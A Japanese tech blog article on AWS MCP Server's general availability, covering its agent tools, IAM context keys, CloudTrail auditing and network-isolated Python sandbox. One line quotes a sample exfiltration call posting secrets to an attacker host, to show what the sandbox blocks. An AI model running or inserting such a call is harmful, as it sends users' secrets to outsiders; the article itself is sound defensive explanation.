AWS MCP Server がGA — Claude Codeから15,000以上のAWS APIを叩ける時代の実務インパクト

はじめに

2026年5月7日、AWS が AWS MCP Server の一般提供(GA)開始を発表した。Anthropic の Model Context Protocol(MCP)標準に準拠したマネージドサーバーで、Claude Code・Cursor・Kiro・Codex などのAIエージェントから AWS の 15,000 以上の API を直接呼び出せるようになる。

単なる「AWS版のMCPサーバー」ではない。プレビュー期間中に分散していた aws-api-mcp-server と aws-knowledge-mcp-server を1つのマネージドリモートに統合し、IAMコンテキストキーによる権限分離・CloudTrail統合・サンドボックスPython実行までを揃えた、プロダクション運用を本気で意識した構成 になっている。本記事では、この GA リリースが実務にもたらすインパクトを、ツール構成・セキュリティ・既存クライアント連携の3軸で深掘りする。

何が GA になったのか — 4つのコアツール

AWS MCP Server は、エージェントから呼び出せる4種類のコアツールを提供する。

1. call_aws — 15,000 以上の AWS API オペレーションを直接実行できる、いわば AWS CLI のエージェント版。新規 API も数日以内にサポートされるため、知識カットオフが古いLLMでも最新の S3 Vectors のような機能を扱える。

2. run_script — サンドボックス化された Python 実行環境で、複数の AWS API 呼び出しをまとめて処理できる。プレビュー版では「100 個の Lambda 関数のメモリ設定を集計」のようなタスクは API 呼び出し100往復が必要だったが、GA 版では1往復のスクリプト実行で済む。これは エージェントのレスポンス時間とトークン消費を桁で削る変更 だ。

3. search_documentation / read_documentation — AWS 公式ドキュメントをリアルタイムに横断検索・取得する。LLMの学習データに含まれない新サービスや、最近のAPIリファレンス変更にも追随できる。

4. retrieve_skill — AWS のサービスチームが監修した「検証済みベストプラクティス」を取得する新ツール。たとえば AgentCore harness のような最新プレビュー機能の使い方を、コミュニティのブログ記事ではなく AWS自身が承認した手順で取得できる のは大きい。

技術的背景 — なぜ「リモートマネージド」と「IAMコンテキストキー」が効くのか

MCP サーバーをローカルにインストールして動かす形式は、これまで主流だった。だが、ローカルプロセスで AWS API を叩く構成にはいくつかの実務的な弱点がある。

第一に 権限管理の粗さ。ローカルで aws sts get-caller-identity の認証情報をそのまま MCP プロセスに渡すと、人間がCLIで叩く操作と AI エージェント経由の操作が IAM 上で区別できない。「Claude Code には EC2 の Describe 系だけ許可したい」のような細かいポリシーが書けない。

GA 版では新しい IAM コンテキストキー aws:CalledViaAWSMCP が導入された。これにより、IAM ポリシーの Condition で「MCP 経由の呼び出しのみ拒否」「MCP 経由なら ReadOnly のみ許可」のような、人間とエージェントを分離した権限制御が書ける。プロンプトインジェクション経由で意図しない DeleteBucket が走るリスクを、IAMレベルで根本封じできる構造に変わったわけだ。

第二に 監査の弱さ。ローカル MCP の操作はクライアント側のログにしか残らないため、組織として「誰のClaude Codeが何を実行したか」を追跡しづらい。GA 版は CloudTrail に全 API 呼び出しが記録され、CloudWatch には AWS-MCP ネームスペースの専用メトリクスが流れる。SOC2/ISO27001 のような枠組みで AI エージェントの振る舞いを証跡化したい企業にとっては、ようやく現実的な選択肢が出てきた。

第三に サンドボックスの提供。run_script は外部ネットワークアクセスが遮断されたサンドボックスで動く。エージェントが生成した Python が requests.post('http://attacker.example.com', data=secrets) のような行を含んでも、外部送信が物理的に発生しない。データ漏洩の経路を1つ潰せる設計だ。

エンジニアへの影響 — Claude Code 利用者は今すぐ何ができるか

実務で一番効くのは、AWS リソースに関する作業の「往復回数」が大幅に減ること だろう。

たとえば「ステージング環境の不要なEBSスナップショットを古い順に確認したい」というタスクを考える。従来は Claude Code に aws ec2 describe-snapshots を叩かせて結果を貼り付け、また絞り込みのためのコマンドを生成して…と数往復が必要だった。GA版の MCP サーバーがあれば、run_script 内で boto3 を使って一気に集計し、結果だけが返ってくる。エージェントの「思考 → ツール呼び出し → 思考」のループが短くなり、レスポンスも速くなる。

さらに、AWS の新サービス導入時の調査効率も変わる。search_documentation は LLM の学習データに無いリリース直後のサービスでも公式情報を取得できるため、「Claude が古い情報で誤ったコードを書く」問題が構造的に減る。本日(2026-05-08)のダイジェストには Gemma 4 の高速化や Claude のレート制限緩和も並んでいるが、「AIエージェントが安全に外部システムを叩ける標準が整いつつある」流れの中で、AWS の参戦は影響が大きい。

注意点もある。GA 版の対応リージョンは現在 us-east-1(バージニア北部)と eu-central-1(フランクフルト)の2つだけ。日本国内ユーザーが ap-northeast-1 のリソースを操作することは可能(API呼び出し自体は任意リージョン対応)だが、MCP エンドポイント自体は遠方になるため、レイテンシは無視できない。本格採用前に簡単なベンチを取るのが賢明だ。料金は「サーバー利用料は無料、AWSリソース利用分のみ課金」なので、PoC のハードルは低い。

まとめ

  • AWS MCP Server が GA 開始。call_aws / run_script / search_documentation / retrieve_skill の4つのコアツールを提供
  • IAM コンテキストキー aws:CalledViaAWSMCP で人間とAIエージェントの権限を分離可能に
  • CloudTrail/CloudWatch との完全統合でエンタープライズ監査要件に対応
  • サンドボックスPython実行で「複数API集計」のようなタスクを1往復に圧縮
  • 対応リージョンは現状 us-east-1 と eu-central-1 のみ、ただしサーバー利用料は無料

MCP は2025年11月に Linux Foundation 配下の Agentic AI Foundation に寄贈され、AWS・Google Cloud・Cloudflare・Azure の各社がプロダクション級の実装を出し揃えてきた。AIエージェントが「ローカルで動くおもちゃ」から「企業の本番システムを動かす機関」へと進化する転換点が、今まさに進行している。

今日のその他のニュース

Claude のレート制限が2倍に緩和 — Anthropic が Claude の5時間レート制限を2倍に緩和。Claude Code で長時間ループや並列エージェントを回す利用者にとっては実質的な使用枠拡大で、本記事で紹介した AWS MCP Server との組み合わせもより回しやすくなる。

SQLite が米議会図書館の推奨保存フォーマットに — SQLite が米国議会図書館の推奨保存フォーマットに正式採用。ローカルアプリ・モバイルアプリの永続化選択にさらに追い風となる動き。Hacker News では558ポイントを獲得。

Google が Gemma 4 を3倍高速化 — オープンモデル Gemma 4 の出力品質を維持したまま3倍の高速化を達成。Qwen がライセンスを閉じ始めた流れと相まって、ローカルLLM選定の議論が活発化している。

ソース